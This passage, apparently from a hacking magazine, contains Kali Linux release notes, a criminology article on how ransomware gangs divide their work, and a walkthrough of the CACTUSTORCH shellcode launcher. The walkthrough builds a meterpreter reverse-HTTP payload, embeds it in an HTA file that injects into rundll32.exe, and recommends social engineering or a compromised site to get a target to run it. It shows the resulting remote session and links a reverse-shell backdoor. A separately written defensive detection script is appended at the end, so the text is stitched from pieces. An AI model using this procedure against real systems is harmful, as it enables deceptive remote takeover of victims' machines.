4. Ghidra - Reverse engineering framework
5. Pacu - AWS exploitation framework
6. Peirates - Kubernetes penetration
7. Quark-Engine - Android malware scoring system
8. VSCode a.k.a. Visual Studio Code Open Source ("Code-OSS") - Code editor

These are the changes the makers of Kali Linux made in the latest release that may affect users. Apart from these changes there is another change that users may not notice. Enter Kaboxer. Kaboxer, also known as Kali Applications Boxer, is a great tool in the arsenal of Kali Linux which users may not notice while using it but which is very helpful for developers. That is because Kaboxer helps even problematic tools to run without any problem.

How does Kaboxer do this? Any application in Kali Linux has a package manager through which it is installed and uninstalled (apt). However, not every tool can be packaged this way. So developers work with the tool authors to bring it into Kali. This can take long. But now, with Kaboxer, even those tools which were not packable previously can be packed in a container and integrated with the Linux operating system. Users need not take any action for this to work. Using this, many new tools (which could not be included previously) can be included in Kali Linux.

These are all the changes brought in the latest release of Kali Linux. You can download the latest version of Kali by going to the link given below in our Downloads section.

Inside a ransomware attack : How dark webs of cybercriminals collaborate to pull one off.

ONLINE SECURITY

David S. Wall
Professor Of Criminology
University Of Leeds

In their Carbis Bay communique, the G7 pronounced their intention to work together to tackle ransomware groups. Days later, US president Joe Biden met with Russian president Vladimir Putin, where an extradition process to bring Russian cybercriminals to justice in the US was discussed.

Putin reportedly agreed in principle, but insisted that extradition be reciprocal. Time will tell if an extradition treaty can be reached. But if it is, who exactly should be extradited — and what for?

The problem for law enforcement is that ransomware — a form of malware used to steal organisations' data and hold it to ransom — is a very slippery fish. Not only is it a blended crime, including different offences across different bodies of law, but it's also a crime that straddles the remit of different policing agencies and, in many cases, countries. And there is no one key offender. Ransomware attacks involve a distributed network of different cybercriminals, often unknown to each other to reduce the risk of arrest.

So it's important to look at these attacks in detail to understand how the US and the G7 might go about tackling the increasing number of ransomware attacks we've seen during the pandemic, with at least 128 publicly disclosed incidents taking place globally in May 2021.

What we find when we connect the dots is a professional industry far removed from the organised crime playbook, which seemingly takes its inspiration straight from the pages of a business studies manual.

The ransomware industry is responsible for a huge amount of disruption in today's world. Not only do these attacks have a crippling economic effect, costing billions of dollars in damage, but the stolen data acquired by attackers can continue to cascade down through the crime chain and fuel other cybercrimes.

Ransomware attacks are also changing. The criminal industry's business model has shifted towards providing ransomware as a service. This means operators provide the malicious software, manage the extortion and payment systems and manage the reputation of the "brand". But to reduce their exposure to the risk of arrest, they recruit affiliates on generous commissions to use their software to launch attacks.

This has resulted in an extensive distribution of criminal labour, where the people who own the malware are not necessarily the same as those who plan or execute ransomware attacks. To complicate things further, both are assisted in committing their crimes by services offered by the wider cybercrime ecosystem.

How do ransomware attacks work?

There are several stages to a ransomware attack, which I have teased out after analysing over 4,000 attacks from between 2012 and 2021.

First, there's the reconnaissance, where criminals identify potential victims and access points to their networks. This is followed by a hacker gaining "initial access", using log-in credentials bought on the dark web or obtained through deception.

Once initial access is gained, attackers seek to escalate their access privileges, allowing them to search for key organisational data that will cause the victim the most pain when stolen and held to ransom. This is why hospital medical records and police records are often the target of ransomware attacks. This key data is then extracted and saved by criminals — all before any ransomware is installed and activated.

Next comes the victim organisation's first sign that they've been attacked: the ransomware is deployed, locking organisations from their key data. The victim is quickly named and shamed via the ransomware gang's leak website, located on the dark web. That "press release" may also feature threats to share stolen sensitive data, with the aim of frightening the victim into paying the ransom demand.

Successful ransomware attacks see the ransom paid in cryptocurrency, which is difficult to trace, and converted and laundered into fiat currency. Cybercriminals often invest the proceeds to enhance their capabilities — and to pay affiliates — so they don't get caught.

The Cybercrime System

While it's feasible that a suitably skilled offender could perform each of the functions, it's highly unlikely. To reduce the risk of being caught, offender groups tend to develop and master specialist skills for different stages of an attack. These groups benefit from this inter-dependency, as it offsets criminal liability at each stage.

And there are plenty of specialisations in the cybercrime underworld. There are spammers, who hire out spamware-as-a-service software that phishers, scammers, and fraudsters use to steal people's credentials, and databrokers who trade these stolen details on the dark web.

They might be purchased by "initial access brokers", who specialise in gaining initial entry to computer systems before selling on those access details to would-be ransomware attackers. These attackers often engage with crimeware-as-a-service brokers, who hire out ransomware-as-a-service software as well as other malicious malware.

To coordinate these groups, darkmarketeers provide online markets where criminals can openly sell or trade services, usually via the Tor network on the dark web. Monetisers are there to launder cryptocurrency and turn it into fiat currency, while negotiators, representing both victim and offender, are hired to settle the ransom amount.

This ecosystem is constantly evolving. For example, a recent development has been the emergence of the "ransomware consultant", who collects a fee for advising offenders at key stages of an attack.

Arresting Offenders

Governments and law enforcement agencies appear to be ramping up their efforts to tackle ransomware offenders, following a year blighted by their continued attacks. As the G7 met in Cornwall in June 2021, Ukrainian and South Korean police forces coordinated to arrest elements of the infamous CLOP ransomware gang. In the same week, Russian national Oleg Koshkin was convicted by a US court for running a malware encryption service that criminal groups use to perform cyberattacks without being detected by antivirus solutions.

While these developments are promising, ransomware attacks are a complex crime involving a distributed network of offenders. As the offenders have honed their methods, law enforcers and cyber [...] relative inflexibility of policing arrangements, and the lack of a key offender (Mr or Mrs Big) to arrest, may always keep them one step behind the cybercriminals — even if an extradition treaty is struck between the US and Russia.

Article First Appeared on theconversation.com

CACTUS TORCH
TOOL OF THE MONTH

Cactus torch is a shellcode launcher tool that can be used to launch 32 bit shellcode in various attacks. This shellcode can then be injected into any Windows binaries. Windows binaries are those binaries that are already present on a Windows system. Just imagine you're pen testing a Windows machine and you want to gain access to it without bringing any third party malware to the target system. How about using the files already present on the target system to execute your payload? This is also known as fileless malware.

Windows by default has some binaries for its own genuine functions. However, these can be utilized by malicious actors to execute their own payload, which is not benign. Examples of these binaries are regsvr32.exe, notepad.exe, calc.exe and rundll32.exe etc. Rundll32.exe is a Windows binary used to load and run code from link libraries (DLLs) on behalf of other Windows applications. Readers know about notepad and calculator.

This is where cactus torch comes into the picture. It can be used to inject the generated shellcode into the above mentioned binaries. Let's see how this tool works.
Cactus torch can be cloned from GitHub as shown below. The download information for cactus torch is given in our Downloads section.

    git clone https://github.com/mdsecactivebreach/CACTUSTORCH
    Cloning into 'CACTUSTORCH'...
    [...]
    remote: Total 48 (delta 0), reused 0 (delta 0), pack-reused 48
    Receiving objects: 100% (48/48), 42.13 KiB | 1.62 MiB/s, done
    Resolving deltas: 100% (23/23), done.

Once the tool is cloned, we need to create shellcode. Cactus torch is compatible with Metasploit and Cobalt Strike. Let's use msfvenom to create 32 bit shellcode.

[Screenshot: msfvenom is run with the windows/meterpreter/reverse_http payload; the remaining arguments are not legible. The output includes "[-] No arch selected, selecting arch: x86 from the payload".]

The shellcode is successfully created and is stored in the payload.bin file. Next, encode this payload using base64 encoding as shown below.

[Screenshot: payload.bin is displayed and then base64 encoded; the encoded output is omitted here.]

The shellcode can be hosted in different formats as shown below. These are already provided by cactus torch.

[Screenshot: listing of ~/CACTUSTORCH: banner.txt, CACTUSTORCH.cna, CACTUSTORCH.hta, CACTUSTORCH.js, CACTUSTORCH.jse, CACTUSTORCH.vba, CACTUSTORCH.vbe, CACTUSTORCH.vbs, README.md, splitvba.py.]

Let's see the example of the hta file. Open the CACTUSTORCH.hta file using any text editor.

[Screenshot: header of CACTUSTORCH.hta. Its comments describe it as an HTA shellcode launcher that will spawn a 32 bit version of the chosen binary, and list the usage steps: choose a binary you want to inject into (default "rundll32.exe"); generate a 32 bit raw shellcode in whatever framework you want; run cat payload.bin | base64 -w 0; copy the base64 encoded payload into the code variable below. Under the comments, the binary variable is set to "rundll32.exe" and the code variable holds the base64 encoded 32 bit shellcode.]

You can specify the binary you want to inject this shellcode into. For example, here we want to inject shellcode into rundll32.exe. Copy the base64 encoded shellcode at Dim code. Save the file. Start a Metasploit listener as shown below.

    [...]
    lport => 4545
    [...]
    [*] Started HTTP reverse handler on http://192.168.36.171:4545

Next, all we have to do is make the user on the target system execute the cactus torch hta file. This can be done using social engineering. For example, just like in our April 2021 Real World Hacking Scenario.
In that scenario, Hackercool compromised a website and hosted malware there. Here also it can be the same scenario. Now once someone clicks on it, we should get a successful meterpreter session as shown below.

    msf6 exploit(…) > run
    [*] Started HTTP reverse handler on http://192.168.36.171:4545
    [!] http://192.168.36.171:4545 handling request from 192.168.36.1; (UUID: ikq9gcxl) Without a database connected that payload UUID tracking will not work!
    [*] http://192.168.36.171:4545 handling request from 192.168.36.1; (UUID: ikg9gcxl) Staging x86 payload (176220 bytes) ...
    … ) at 2021-06-19 10:40:37 -0400

Similarly, this shellcode can be hosted in JavaScript, VBScript and VBA files. However, note that these are not undetectable and anti-virus will easily detect the shellcode.

DOWNLOADS

1. Gophish : https://github.com/gophish/gophish/releases
2. Kali Linux 2021.2 : https://www.kali.org/get-kali/#kali-bare-metal
3. Nagios XI : https://www.nagios.org/downloads/
4. Rust Reverse Shell : https://github.com/LukeDSchenk/rust-backdoors
5. Cactus Torch Tool : https://github.com/mdsecactivebreach/CACTUSTORCH

USEFUL RESOURCES

Check whether your email is a part of any data breach now. https://haveibeenpwned.com

Hackercool Magazine is also available on Gumroad, Magzter and Zinio.
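The closing remark in the Cactus Torch walkthrough, that anti-virus easily detects these launchers, can be made concrete from the defender's side. The sketch below is an added example, not code from the magazine or from CACTUSTORCH: it triages a script file for the pattern visible in the HTA template, a long base64 literal sitting next to a Windows host binary name. The regular expressions, the 0.3 threshold and the watch list are assumptions, and both sample inputs are constructed.

```python
import base64
import binascii
import re

# Quoted literal of 64+ base64 characters, e.g. the value assigned to `code`.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{64,}={0,2})"')
# Windows host binaries a launcher might name as its target (assumed watch list).
HOST_BINARY = re.compile(r"\b(?:rundll32|regsvr32|mshta)\.exe\b", re.IGNORECASE)

def binary_ratio(data: bytes) -> float:
    """Fraction of bytes that are neither printable ASCII nor tab/CR/LF."""
    if not data:
        return 0.0
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return 1 - printable / len(data)

def triage_script(text: str, min_ratio: float = 0.3) -> dict:
    """Report base64 literals that decode to binary data, plus host binary names."""
    blobs = []
    for match in B64_LITERAL.finditer(text):
        literal = match.group(1)
        try:
            decoded = base64.b64decode(literal + "=" * (-len(literal) % 4), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all
        ratio = binary_ratio(decoded)
        if ratio >= min_ratio:  # text-like payloads (JSON, HTML) score near 0
            blobs.append({"offset": match.start(1), "decoded_len": len(decoded),
                          "binary_ratio": round(ratio, 2)})
    hosts = sorted({h.lower() for h in HOST_BINARY.findall(text)})
    return {"blobs": blobs, "host_binaries": hosts, "suspicious": bool(blobs and hosts)}

# Constructed samples: inert filler bytes, not shellcode.
INERT_BLOB = base64.b64encode(bytes(range(200, 256)) * 3).decode()
SAMPLE_LAUNCHER = ('Dim binary : binary = "rundll32.exe"\n'
                   f'Dim code : code = "{INERT_BLOB}"\n')
TEXT_BLOB = base64.b64encode(b"Plain ASCII configuration text, nothing binary in here. " * 2).decode()
SAMPLE_BENIGN = f'Dim cfg : cfg = "{TEXT_BLOB}"\n'

if __name__ == "__main__":
    print(triage_script(SAMPLE_LAUNCHER))
    print(triage_script(SAMPLE_BENIGN))
```

A hit here is a reason to look closer, not a verdict: embedded images also decode to binary data, which is why the check requires a host binary name in the same file before it sets `suspicious`.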